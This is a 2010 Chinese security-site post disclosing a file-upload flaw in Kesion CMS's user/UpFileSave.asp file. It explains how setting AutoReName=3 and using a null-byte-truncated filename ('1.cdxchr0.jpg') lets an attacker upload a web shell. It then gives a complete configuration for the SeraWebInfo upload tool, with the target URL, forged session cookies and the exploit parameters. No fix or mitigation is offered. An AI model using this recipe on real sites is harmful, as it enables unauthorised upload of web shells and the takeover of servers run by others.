热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

科讯Ksion CMS 通杀漏洞

发布时间:2010-03-11 18:06文章来源:未知文章作者:黑白前线 点击次数:
摘要:发布日期:2010-03-11 影响版本:最新通杀 漏洞描述: 漏洞文件 :user/UpFileSave.asp :通过自己构造参数AutoReName=3,可以将上传的文件名保存原样,通过截断可以直接得到SHELL:限制,后台禁止了注册,或者禁止了上传,或者把user目录删除了,优点是不用找...

发布日期:2010-03-11

影响版本:最新通杀

漏洞描述:

漏洞文件 :user/UpFileSave.asp


通过自己构造参数AutoReName=3,可以将上传的文件名保存原样,通过截断可以直接得到SHELL:限制,后台禁止了注册,或者禁止了上传,或者把user目录删除了,优点是不用找后台.
 

 漏洞测试:

老规矩,先下载一个 SeraWebInfo

把下面文件保存为kesion.seraph

  1. url=http://localhost/User/UpFileSave.asp?user_upfile.asp  
  2. login=  
  3. code=  
  4. login_postcontent=  
  5. filefield=File1  
  6. filefield2=  
  7. filename=1.cdxchr0.jpg  
  8. filename2=  
  9. local=kesion.txt  
  10. local2=  
  11. type=image/gif  
  12. type2=image/gif  
  13. cookies=ASPSESSIONIDAQRCDTRD=GGMHDJFBKDFCOLINMHICGBLC; KS6localhost=RndPassword=RL%5FXL%21QdIH5nIk1FvDz5&Password=469e80d32c0559f8&UserName=admin 
  14. name=BasicType&value=9999 
  15. name=AutoReName&value=3 
  16.  

1.加载配置


标签分类: 安全漏洞

上一篇:科讯 v6.5 CMS Oday(利用工具)
下一篇:ACTCMS管理系统 注入漏洞